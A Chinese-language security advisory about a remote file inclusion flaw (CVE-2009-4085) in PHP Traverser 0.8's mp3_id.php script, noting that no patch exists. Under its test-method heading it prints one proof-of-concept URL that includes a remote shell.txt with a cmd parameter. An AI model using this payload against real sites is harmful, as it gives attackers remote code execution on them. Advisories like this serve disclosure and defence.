发布日期：2009-11-23
更新日期：2010-07-30

受影响系统：

PHP Traverser PHP Traverser 0.8

描述：

---

BUGTRAQ  ID: 41899
CVE ID: CVE-2009-4085

PHP Traverser是用于在网页上递归浏览目录的PHP脚本。

PHP Traverser脚本没有正确地过滤提交给assets/plugins/mp3_id/mp3_id.php的GLOBALS[BASE]参数便用于包含文件，远程攻击者可以通过提交恶意的URL请求导致执行任意代码。

<*来源：Adhan Yantu
  
  链接：http://secunia.com/advisories/37455
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.example.com/shell.txt?cmd

建议：

---

厂商补丁：

PHP Traverser
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/phptraverse/

浏览次数：2231
严重程度：0（网友投票）